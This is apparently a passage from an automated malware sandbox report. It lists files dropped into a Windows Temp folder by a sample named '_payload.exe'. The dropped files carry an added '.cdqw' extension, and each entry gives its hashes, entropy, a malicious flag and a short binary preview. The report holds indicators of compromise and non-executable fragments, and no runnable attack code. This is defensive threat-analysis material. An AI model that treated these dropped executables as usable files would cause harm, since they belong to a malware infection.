                                                                                                                                                                      SHA-512:2AB60E0916EDCFC844C729DECCC6F57B8F6AB29D572AF71A91270E8B7DD05F2DE55AF679160BACEA699A25B7B74F3F8CB84C03748F0D6847893E8044BD12C336
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:BM80.......Q*r3lF.k...h|b..8\..Sp.)k.c:..o4.$..\.......bv.{.....z18.......q.M9.)I.....?........./..U.Xz.U..O.}..h.e.gT.V.qP6'......8o@J..^TS..X...c.~..j*.......ky..G_.U.t.s........p.....p..me.pT.0...x..(.UFT.Mt....g.&.....D&...d[.%....P..514..@...r..;...T.;e.k'L..7...Q....#.Nv....cv7.T..........w....K..+Q...T.p.,Z<J.....e..I.....oe.R.!..{.:..o....l...EE.y......vgb...}..O...N.Hn.kYp.]...o$K.!6N>.I....b0^*...;@y...f.y..UsJ.Y#.uYW.Y....(.$.../.R8.7..Q9:..H.0.._.V...k.........+.Vq.......-$$.r...jO.....1X:Z........t.V.y.i&}...V..x...D..5n@.N....Y[. ...3.L......v.l...oc..R..[......-....{.....DIC.B..0.;E.'\..Y ..`.^.6..<C...m%.p*.AG...r}L]FU.{..x.\@....`TL..1wW0.nE.b..\....{....R.....K."".o...o/...\.gF....?.#}.B$....nE....C MU...-....d.M..F..i!..j.EY}$..9...35{..{.B..P...uV......zl/...*{.oI.ou..90.nk8.w.W.c8(w.C.&(<.A...."{....;...=.FX...O..df....j..P..a>.....l.2.l....>....$.R.....Q.m....iI1........ z7..`.~...@n..S.S'.....DX.....;.g.:J..7...3

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\jusched.log.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4406
                                                                                                                                                                      Entropy (8bit):7.955143191874938
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:oJfzav5wIOGZGIw4tmiBGrVdeUQoYcSQ8:2zK5w/8GI3vBGp4t/Lz
                                                                                                                                                                      MD5:6CEFD9476619F511496C8995B0D6C80B
                                                                                                                                                                      SHA1:6069C02C294716AD6350A917EB9D61DF096CDBEC
                                                                                                                                                                      SHA-256:FB5C6CF41B77BF42929C3EAF1A054F8DE34147783D55C2DB6919C52F1032AB68
                                                                                                                                                                      SHA-512:B5F23E6D4495F15A297F4E2EFD0B55FC06078E9E7398D8FE624FF096C190E739AEBC8BE77320EBA801B2A9D84376A65BCFB3701DAE0089888BB1A29A97A0D86A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:[2023.@t.Q.|.9.Xs.1..... ..Z......f.n(.........{) .....8.O....Tn..=h.<:3aT...f.m..."........puq.E..@"X.U.IR.V.~G/.yK.7S....H....y+.X.4/)....i....8.8..f....(..}..i.`I1.K.I.vtp~....pI;A{m..i...B. ....D..%..~.....">m;.8.I.#.O....E.\.Pa.+.}.k.O)[B4K.*.....y...2..5...8.d....,......A.q^..r@...#.. ..q#..7...)7K.$^B.v.G..+./V.v..u3.7....m.D........oSJfM..a..fd.bW>..0.lr.......>.....K..i.-..{......j.0...G.^9......~M.....d09.F...).L...fn.r%h.~.N..O.34....O..m.1..8l..v#c..)?....^....ct.....Qg.RW.1.M.a...,..J.F...vg=.y.|........lF.......,..1.W."k.I...V..}..F.._.|.X.w...H.&T...]....!....7C.....Y..{..Y.&.].23.Nc.Oy..3k...d^./:m..MR..*....A....%.q...K.{...\5eW..Z=.gYZ3... ..4..N.....-...B!w.;~.+s.6............#....#.X)..y ....;E..s&-..x...".....r|..aA.Lu:.].v`.$n7....6/........=yv..*..$x...C..Vs.`w..A...+...n.%....Z..D.9/\.b..!....<.......y.Q..&..).n}J...+......,.n....Jd..ds.3]...F.f.!.xv.p....i...|.@...o.o=.V..\..}...........um..WFt.3...:.o...E

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\msedge_installer.log.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):22093
                                                                                                                                                                      Entropy (8bit):7.991654534970632
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:384:rSMBmV2FC6VlnabCWh6mJO1o9RYanzwgcN9Uvju4ygu+vpFV+:rvmV2PnabMmJOgogyZB
                                                                                                                                                                      MD5:B00DCA29F41A400044C6B84B564EC7FC
                                                                                                                                                                      SHA1:046FA92A2B897489243DEA3C65FC01034567A81D
                                                                                                                                                                      SHA-256:1DAED82B114FEE04C0D0991F6A0F62DE17972625122FB78F624D9C14EBDEF2C5
                                                                                                                                                                      SHA-512:38C274E0A545ECAF661E532EBE5BC3CB7F060AD636A33959D4134F2746D7EFBD0D98DAC918A0EC8657FC666D77AA9C2E09D3DF1F016A1C4EEC12ABDA9C87E726
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:[4004.`..:E.<pO.......L.H~.. .Bv...>.....UF.^[..e+..#(.|vhtf.....(@...g;...2..cH..].8.PQ{ GP.t#..'.d...d...f\..[.k.I<L.g.......)y....,./[.Dr....Ug.oF..l......$...@?-..YyRB..r....^54c....X..Z.....g.VB}..E..r...s.D..e."..6P......r...C"-.'..W..........t..k.?....'...551mT..w.yJ...W.Xg.P.e.?.@X....p7..w..M.O.Vt..&....M.S.u......B.G..A....Q..>$..J.......$....>..Z} .........k..*.ax..F.F.7Z.l.... D....p.....NN.y...'8.Q*..e.:..@c..S...@c.j.K. ..mT.y.q......l..>k.'U...,..o%4hY...R[@q1...........{...1....2.<}n~...c%x...|.Ju.....n......P.4F.Vt..S.wo......,....&N4....5....U'q VQ$.6.5[..ky..@.R.X...9nr....e...7.y.C..o...n..\9.5..E.?.O.h..3M..r.Z......}.rE.Sz.%...G.l.]...p>.S..j.a....".x..UT..G..>.... /.V..7..Um...a.-(y.........LS.b\.....<.Z....|5M..6....Q1....d.G!O:..(.^.$|I....d...:...@..2f..(..H.R^....(e....\.......8..p..}~&..:c.............+.+s$_"\|.0.+...........5|.H......B...Yuv3...W..X....Z../]..>d[0..$..[...o1].!H..2..r.zd..t.!Cq~.

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\offline.session64.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):66542
                                                                                                                                                                      Entropy (8bit):7.99743314954008
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:ViXn+uL8e/m6KSrNOMRgWpKj6OvATtj3ptV:ViXnr8e/wSrQYzpKjFObptV
                                                                                                                                                                      MD5:2603DA37257A8A247FB2C33FF9CF3958
                                                                                                                                                                      SHA1:3E107A84DD60774EEA2476378258126EA0DAE9DF
                                                                                                                                                                      SHA-256:F73B072B091AD2025929FBD13236992DB95CF19528EF8B500CF958BF3FDB05E9
                                                                                                                                                                      SHA-512:BE9FDDF5EBBECDDBE12B14CC04BD8F2C712FAF51862122B886361D372CFA93074FAADA742BF2ED8A991ABD683FEB5B036225477521FB7096CE3FB59A9EDA07E4
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:1G.f....&.K...U...B9O.r.... _G,.c......r.<.....v.:k=<..NC..w..K>...K.z.....3..9.h.....-.Gs...l..n>....8.4...;.>+.. AL.n....f.....G..-k9v.....R...Wn...:...=.<..Gi..m,..7.....kha.F.h.7v.-Q.%.F.m..ZD..n(...Mb...jgh.6#.......S.C.Uk.C.6...6.*.]..5....V....U......|.P.......:J.#f.2'..._....2..j."Y.....i....+a..*....[x.......^UK.....L"x.M .N.9...,..5~.&.F...g.........._....B.iI1.R.=S.!-..I...[.S.sB.........}....S.#.`..t...X.<..CQ.....(j..\R...............<1..5.p.g.....[`..$M.5t._J..y>..j..6..GP...~....'w..)g.)..W.....f'.......'...'"L....7....TY....)2D.{........Oq.D.r#.Wtu...j.0bh....v.h5.u..~....$..&^|....4...~J..<.g\(......lw.E..c..=]..M.t...o.....$v..Q1.'A..{@.. .8....*@.3.s.-....Z..9.....O...E.u......`.i...y?....D......~...SW..........cD.#.#..g|......h....@h.A@.(U.<....8H.].K..m.fYh.....$.s...4.k..s.7g.s...c..Q........y...j...w.......}90j..0..wJ..a....3.....!..&...a....7...Z).I.+........JJ..B.V..rv..A.K.....-+.?>a..n.`mm/t...M.(.y....C^.Bh

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\prep_Form_JSI_API_not_a_real_file_V8_perf.cache.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1045
                                                                                                                                                                      Entropy (8bit):7.803891580628994
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:yYYz45hYHQm9CyoP1PKDBbRdfe5gknybYdCoQcoqyuP2bD:yYs5wbP12B9oOknybYdCZD
                                                                                                                                                                      MD5:A850838C81B8F9B4E3D45C7867ED3392
                                                                                                                                                                      SHA1:C280EE636A54B4DF84BDAE815064A772A975C032
                                                                                                                                                                      SHA-256:690B3FE2C2FD65F04A6638E7F544115C17B4D52806E435DCED2AD589A650D9A5
                                                                                                                                                                      SHA-512:195A3C546F9F2D53FB8B6AD8B4039674DB045ED511604F17E080723BA460C80751203944F591DFC3B3A31254EC1D0B41CAD0852EC708419BB411DD396CF65562
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:RNWPRF.7fl.)..0G...a..y..?S..H.;/[q.......CL..xk/...(S..=....^..c....&....|.+.....n.hm.%SzcNd6..=....#|.h.B.....9lk..n|L.c.k...N. ../|..Y@......X.cn...2.r......h|....;*h......1........W.............Cv.......g.....6:bh...........u?b.~..7.#.....+.j+...@....a...@..l.%^.q7....(..4.t^"t.."~.f......w.j..^.A..<..q-]..B.m....b..k..6.....J..~..."..>.....!'m{.........U..dhm. ...j....]p.v.....#C....V...XU...F..h..#.<..f{.2.V.l...1..Mt...+kS._...$...A.O^..;x..QL..'..F......=..{I.......4VC......c.egL.......k0$b....k...........\..k.".A@...~.!X.\...9\`j.'..(.`.......r`d...-....6.>..4...?.T.|pNt~G..../-B.+}.l....ihs8.kx.".Z...6(..%;.kS..e.C...h..8.xg..7....>B....u......e.z.@..b.dQ....!.yq....*.h...Z..h.;C.I.q...P7.............i;...w.h...{..9V.2O1. ..y.fo.D....'Q.....z..@..:~.t.7..Q.:..6....C..........v.../.c.N.)..\..D...m.......j....5.f..m.........J..".".....>v....x.....=0.b......'Ux...(n...g.Q.. BU..mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\prep_foundation_win32_bundle_V8_perf.cache.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):662049
                                                                                                                                                                      Entropy (8bit):6.820736284713287
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:+mpCFZK0nPRMf5t/EpwSkpyY8hLhzivQiifjhsLT3DZePTVakbYwsqVhKXHgjSD/:+mpQZ7Y5dEvYUL9cQiee/t4P+qVKTpp
                                                                                                                                                                      MD5:A05B5C31EF412F9D1A0635F4ABC5FB14
                                                                                                                                                                      SHA1:74774DDAA4DDFB668262AE4F84B935B9A7ADA5E8
                                                                                                                                                                      SHA-256:5AF963D4D9B175E10D8EE3D104EF17300143815DD907BF133BCA23674A057873
                                                                                                                                                                      SHA-512:2DCB17DFF578C0D86258B0C643E6645CAEFFEC5BC0F19ACA8AE912362FF119B0A63E4CCC3B12F9D2B852F02E87355243B29B0548E2F5DA1B15E8509A06DBA6A9
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:RNWPRzdp..\.0...",..R..(.M.u..T...=....G7E..f..^...`<.l...z.>..T..*.@]..V..../Gj,.`.d.].......:.`..q..2.+.gs^...+...[...#..s...\.e[..C.s..lm.k..r.P>....'.D....{.....ys)j6........|.d._4.<..`W=.|`5...@<!.WB..8..^..%>.5..{...c.n."...X.Y...;.R$..... ~.S;{l....:..k".`.......n}0.0..Q..7......6M|4.....4..9""...4.....*.Y..pSsM.fn.5....e.......E.W..-|..O(..i....?_.i.G.6..mt.s.*...J.t\JK.lJ.;.Xu.^...6.:\....]d.cH..4.?i.DE.M.].>.v..h%..Y.5..#........8>j.k.&..GB...........2U.U1.......6....f.j.q..H.....&.;!.9...5....d9?.+..X-0.j.FQ......:...48A.y.F...~....>..7P5..=/N...h.Q..LrU...eCcC@..6p.Q*.......Ei...Pg...u.3..7l._.F.8na...}....Nk.....@)t.......\XC,c4....f.....B.J,*...9..A.*@-....?.{....2.fb..*.Q.> .Ja...d/.5...........&,}.N....{..K.!m.O..I.?.of........t}.....FvH.:.YD.[..>.D8*..4q...'L.(...?L .Y.pT)..y...b..x.I..0...TV...>...~.{.0H=...A.kI......h .)-.F\X.oy.........{..v...........\.o..G..v...ZR........2.d...u.?.P..-.K..'..|b.x...8KWE.;.Q"=..M.....

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\prep_privacy-sdx_win32_bundle_js_V8_perf.cache.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):193297
                                                                                                                                                                      Entropy (8bit):7.871132317136255
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:3072:D5ErIAnKBjWerxLtPpk76TXC4pVojpCYPmuihm/+DaClwc6/O8Wv+lWRQ5ukyS68:D5KIAnKtWuLtPQP+VHgmM+D5SBWmlsQH
                                                                                                                                                                      MD5:88D5CD2B2B159775F4FDCA2E7366636C
                                                                                                                                                                      SHA1:20EBF41A7CDCB0572BD7B4A60D1C8A4F9E3BB917
                                                                                                                                                                      SHA-256:3B5FAACCF50E761C5AEF518BC936157B31D10C9DDE8E132860CA15549023A185
                                                                                                                                                                      SHA-512:7196F7DF982245D19F3085B3BAC39E15D33C3B26F8C15715FCC8BDBABF5338FC02E64FA780C849E5870509AFBD62FA918101EDE38389DEC2D9C6CD70EFF2F9CA
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:RNWPRh...D.."+....O..z.......}7fa.b/..^....r.c.#...?.-.h.|..Oy.i...H.G.a..'.P&y./._C..!.1.....s..Idh.\.I..>4XLz..$...Y...:sJ@.`.za......&.........D.sT;......~p....E........I(...nZ"..n.~...<..at#u..7.......'...x.5.E.jX.,m....h..>x.....P....3,7.h8....Gs....3....f.-8.....OyD.QBM.e.X...gV....Ch......VnD.!`'..Q.6...3.#.<(U9..u.Y...gD...^.t.._.2...G.f.>...P.:.).../.$.E..`ig..2..V..........x..smrJ./...e..;.3..a...w......(,.Xcs......4.*..?....R-<.n..i.....#...d>..l.....pvM.9.D..'eg.{...$.z..F....6...}...OY,...C|.N.9L..O4.\..>..m..Q...5..Y..u.kK(<3.'.....S7..M.j'*m..`_......G...V ...C..9Li..A..X....Z...=....N.E..+....l.2v..Xw.;..).4.07...$.. .....U...h.......i...C8|...x.qy...0..d\+..{:..k.$..Vb.Q..*.?%..Y...h..+....s.0.EX...%.xk.....,pi...0...k.)]..p.-....Q..a........$....yh.!.p...........U.&......&2..>.6.@......V...=Y.\..b....C.4...J..M..R..K.hI..~.m...&L.ee...:....&O>....(.2....4IP.....J...n...Sy.WX.....Y6.N......H.M0$.^.,..=K.V..@h<G.b.Ob-........

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\prep_ui_win32_bundle_V8_perf.cache.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):240241
                                                                                                                                                                      Entropy (8bit):7.548304848862768
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:6144:ho9Cl+Zhe+/lQWUIhBPIaSEHCVoWYxsmht:i0opdUuPIalHCVo3
                                                                                                                                                                      MD5:C159C179D4F51D7049E29F8F566F633B
                                                                                                                                                                      SHA1:6999C63F2452341E878B8096A540604A2E82416C
                                                                                                                                                                      SHA-256:A8250DAD104225F5056EC566B245D4E6B982CE975C8EADE753A020ECDE0A4236
                                                                                                                                                                      SHA-512:60DB792A26BFC8EC194F43D79D91226803240431FBD26A9DF5380B116F3C73A07A03F6C70319AC154FCC439CF975024C6F92C71ED982C3C4833DB01BAF37B95C
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:RNWPR.^.:*z......F.K2..Nt..|.....m......7.8.M..]..B.=.k7...z..A.T.........a..../....B...,.q.....N.V"...r2.R.c.Dj].:.'.F[|...,.Z.@.M.y.k... ..".q.j.z.(.....$I..c+.X......9..7r...j....D..JV.r...@.....)]].....S.!..K..v.pD..A.......:+..i...Qb..B.21'.....H.p.L<.....{...O..i.....mH..j.>.h........?D|...P.5............w..2..`.li1*Kr._..i.~.p...8..."z|.......z.~.....}}{.Q.e.CMu.h.@=.e.<*_H......oq7..W=..6.;x..P~.?..?..!...WO..d.Y.2....q#.XZ..Nn1.d-*9(E...V.u.h.P.,c....1..<2.[...&..gE...<.........i=.}Jn..........J.~.i.0.dv.l....t'4l@..._V....1z...{F......V....(.o....M..`.".........."........7t.f.0w.....K..y......P:d@"...+}.6ce].>$.y.k..x.....r.X.9..Q.A.c<....+.xu.W....1q....M:.7~.Tq.0........n..S.b.....([.;.c~.....H.&H.:Y\.r..i.>......5....j...nz^...J..%.q.O..~..6......dC..;...oCw..7.*.....m..Q.3}..4..g..XHD..........K..p...|... ..]N.&..}*.,..M.T..-,...)6?..Pp]..,.Y..p.p....=4....8J.S.g}-...6.v....aP.q.g.x..B.t....0...D K2.k..I..Z>9...-.X..c........

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\tmp3BC7.tmp.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS-DOS executable
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1151310
                                                                                                                                                                      Entropy (8bit):6.929373407480307
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:gt0j/KGxOXGUXAjCymYZiVtElVIBT2roqnTSSxWeT/dRPOO8dWQHUq7W:m2uwAYZt6C31WeTVRPOhd7Uq7W
                                                                                                                                                                      MD5:4605FB1CE589925B9EE6DAFA3EC49F4B
                                                                                                                                                                      SHA1:11788700DB14C5D2B87595C3C703355A281AE5D6
                                                                                                                                                                      SHA-256:98133353158CFE6173CFE7CE1A6EFFAC016BDE005433A4B6D00581C25A44CEBA
                                                                                                                                                                      SHA-512:8FB7702392B3CF8984C3D4978251990411E3E974DC5A0373831D48EB56E55D4CD01ACD6EF38743E9E37A0ADBDD24E6437864BA71D28EC6FA0199959415458422
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:MZ......I,>4.{....!.....!.0.._..Z....Z.ak..h.&.U&/86...q......33.F.@.k.v.S..f:..u.cT...G..{..7#.E.W}.f*#......T..D......5..H.L..6w_..Uc.{...*...Q.....W.g.0.u...t.....\..6.kU...!bb?.x}.G@....#...'...g.(.......^..$...GS[w./nH.d@...._...=A;..uK...,.U.M.}j..E.o@....4$.$.8HD=.%..:.ri.#J....WXZ....?.....w....0......GCI*..BV%.....e~."....E.m.}b,!.5.Q.8...z.....n.E..u.....1......y.;Z....,.g.....r.E.9.....&..n....}X%x...O.\..+F H.'h.?'.dL..c.T@.2a1...I.}......+..M-.......P.56D,.#.+&.E"..:..y.U......2.GC....[.q.~.....*...0..cZ....`....o.x(.5....sAi.......;..1...6......t`.:#../.E.Yy..{.):..w...K..#...]?.>..)...\.(9.8e,..AB....H4.].*.......iG.Gz.. u...*...........i[.%.i.C%wW.0....Vt...$!........f....[.,..>5...{.!t..8,.....r..ZE.....3}...........se....sH.)...V..:.\..fV.......m .e..U..+....(..?c....;..Xi....l;.5(.....%.".w.e....H.>.`..!.(.... .9...".~....s.sk.l1a......(.._......2_..."..x!F?,...sg..l..Z.!..r?.......qBg...bg..<('.......`....+.x..\.D;.

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\wct150C.tmp.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74540
                                                                                                                                                                      Entropy (8bit):7.997616686237543
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:kmVKdWUiDDkzdx171LWyljK1k92EER8mm0ps09g3ZZxvYTf3pX7:ZaisRx1719N2kUEl0pX96ZxvYTxL
                                                                                                                                                                      MD5:5BEAB8757C3E333F7DA0E3CF6111FCE3
                                                                                                                                                                      SHA1:344F87AB4CD128AE699F272BD0558E2AA08D440F
                                                                                                                                                                      SHA-256:7F53B2A7E9FE928855B2C939E0E6FB90035F411B85857FD1C944E8264E2617FF
                                                                                                                                                                      SHA-512:5E04ACCBCA6F2BCB4457D043D739AE0F1051F495DF97E64B7612AB7F852394E205D1C9E858184405BC0D740A5450E9913B79AD45BAAFCF97C11E0A09380F6E76
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:{"ram'....@f(b.6.Z..}....t..dL..JO.iPo.lC\whc!.5.>.db"Z..O...Y@.W..?d..3..3..r_)....NV...].........J.T..:A~D..........-...M:IU...p'.|8......4..aN.^e.T.;.73La....y..~..].\..|.|Jmk..VDLnhT...Cz...B..'z..(.....3.*....e...tQS.....6q].>5..}O+..f....qW.p"dk..cj.kN.[V.:!.........I.D.....Q.O..M.O...>...T....q_o.7..B>..^.........0..Fi..u....qf.Y..pL).M{D..*.95....b.U..-.."...r._..0H.8.........,.q..I..........Gk....u.eA.TG..x..d.<:..6Z...0.@.9.gi....bK..>.t..v.K^......!..Cb..&..-\....8a)h......A.).L.Mm......;.R.<$[.6Ik..NF......4.0..c....8.....z.P.+...r..@..+$..m..+...'\..0a.....fm(G..............JS....*...~.l.A..q.).h.6........y=U.|5..LJ...@..:.}X.A.&@.R..6.W.O....p,...;...@....5DE.........`X..y.O{.e7.[Q.. Z.....p~....x.r../ubZ...x..>.d.m...R.-{AS...FqHEvu..OGhF..1.....6kAo....6....a LF.ET."P....ZQ...t..U#.ui..O.xJ'.RW. ..$..f..U.Q...3..6.T3..6.a..s..]qz...z........mkxj`6...|....\w6.i.7....Vy.z4..TQ.~.......}.G.{.}...].>1.. e.+...q...8.+I...

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\wct33D7.tmp.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):65188
                                                                                                                                                                      Entropy (8bit):7.997008322080646
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:W9PPDVhPFyxCRq42/ANVpHCdMowiO4KQ1ozfVkXR2g4x:WpPRNFygRMAXpiGowiu4WVA8
                                                                                                                                                                      MD5:353E6C2D5A794933FD8D11C0EC928C3B
                                                                                                                                                                      SHA1:7B92D4E05C7057B68AAEC5651A38F48A417A502B
                                                                                                                                                                      SHA-256:41847B2BE27CADA70044A673EE97AA32BC3FCFA5F698956080AFB5E3E52B2EEB
                                                                                                                                                                      SHA-512:D645AE741784F28E0716305E918481DEC0ED9752C4CB068B736D10B253C67CCB47044402259AE00110909675A2B4981E45B8B41BD046B1002F4321F06BD0DD68
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:{"ram.Y...&.U>T...;..^D...%....... .-Eb.:.._.....5A......=--s."<Q...^.n....9...p|. .!...I.......7.OW........g.<W..B..6......HF.....d.w.).q.3...).S.&..H...e.i..=...!.4..s..pk.0...s.p. s[..Q..b..+..R....O..;z...I:..M&(8.0.d}.;F.s.o..).&.<:.l...Q...I.9X\!b.....sMB.d.?...q.......G?..z3.H.@.6f.....@......:....d.....C.O.&~.I................\...:a].[.R'........N..ec..<C...zt....?.9.}.,.;..e......?Q...7..}..By.e..jV......:.........l."...B&.s..-J....9.D.....;3)..m+.........Q.R...4..v..G...sE+j..F"..W.......*b..T....]....).<J......m.....9>..........r^y..t..$.. 5...L..5.tk..@.$....:G*......D.^.Y....{E.......b...P...l(.G..4(....Fv.d..U.&0..M.+_.d..Uz...e.|s............%$....31E.e^.......w..g..........{:...U~...N.M...?.B..2.^....I.K.$....:....:...1.x.K...Z.%...<v...5.".C`..D..4q...E....<.K......}..#...e .i1....+.rG....q....f.....dFU.L...G...0tkke....?o!.....qb.)P#0.....X.X..p5.;>..@..b...L.7...ct....b..Q.2E...k.9x.#.y*.$......T....#.(.=.!.YQL.....3C.5t

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\wct38F0.tmp.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):74540
                                                                                                                                                                      Entropy (8bit):7.997145089990632
                                                                                                                                                                      Encrypted:true
                                                                                                                                                                      SSDEEP:1536:yuu3KIt08khtn03FoY8490zxPmMyu8yJotU/5Eh5Tz3mOJsuXdPovYa:yuJKkhBOFCFPmnUOhLDDFoga
                                                                                                                                                                      MD5:B0195F01DFA88DCD06D18494E3006596
                                                                                                                                                                      SHA1:31FC930A940CFE6ADC59818831ABA78233658CB2
                                                                                                                                                                      SHA-256:3AF53E17A309941CBF2A71D9ECEB791414714B1D6D1A055EE8B1910EB9BA2B8E
                                                                                                                                                                      SHA-512:89DDF74985CFB8CC14C848943FC1B090B350B740EF6C0939D60934AC5B7021CEB5D88FC8B44000CCB70DAC9646F7E57358DF370A9484A1E2A0253CABCFAAE2EF
                                                                                                                                                                      Malicious:true
                                                                                                                                                                      Preview:{"ram>...l.Q`..z....^..3.....}.L...k..n.Nd..u....J..guL..!.4Lu...vW.x.....Q....n........4.D..y~.....'....o.F`...M..1.Kg.......mE...N|...........]..r...D~$..W.(./.^3....#k..`I...'...y.z....6..x..){G\ ......L..U....K....0.9..{a......mq.y2..... ..7..e.h..../....<...-............Ms.:...>.6L..+...y..<.....S....1..Y.O.....0...^...Ni.O.........zm...].....;/h.p..C..\.(.@.Y..Z...+.(.o..2.%...D/fu.K......?|..[.+...?C=..e...j..mIsc.b5J.Qe......mR>Gh ....iP.k..b..n.8...........z...4q0...g>..sX.n^.sF.{...$..T0o2....._.E..8.qr.>.1.......N?m..}o.B..;...`....f..[.g...[7.".:..qZ. +....n....T.....#.U.&?.,,..K...J.\E.U/[.0.~.Z[..g.8...yb...K1.^.N".J.Wc.e.W.a-..js.$.]..B.Mv9.....)..Vt;v6...U.|..w.Q..R...|...........5.4..^.......A@./.,S.}Nt#E.I=.....5.O.....3..\..,6..#uW-.v....}.......gm..;..^........l.w.?...a6.>$ge........o$~T]..-..3i4.}.3IO.W.V....H..).z.Cc.z.S.3...1...N..E...k..r..S...~..1|..n..9h..4..5-vEE....1....W.Y...V..=..`.!.]BH]9|...Gx.....{....L.1.

                                                                                                                                                                      C:\Users\user\Local Settings\Temp\wct3D66.tmp.cdqw (copy)

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:MS-DOS executable
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1601198
                                                                                                                                                                      Entropy (8bit):7.987451630407055
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24576:SDK0o270SeiN9YqxCCg83udcWXDYajPF2410wuRpGfFki94qSe/wsNfzUg:S20L24gQu3TPZ2psFkiSqwozt
                                                                                                                                                                      MD5:7C75E2492E46302276B04D541D5797F4
                                                                                                                                                                      SHA1:88696AB0356824BA6A68ECD1A852E20257F24D0D
                                                                                                                                                                      SHA-256:D5C1EABDA90071846750011C06E82089C066D8B943367B263CCDAD5278D6F320
                                                                                                                                                                      SHA-512:03E2603F5DF1EB88F7BC6108BAB16197AC854313258B384B1F87A72645B58B363F00D9D702FFD83C4130AC8FA0DAD96EC908969CA24821D593E07357271B0EE2
                                                                                                                                                                      Malicious:true
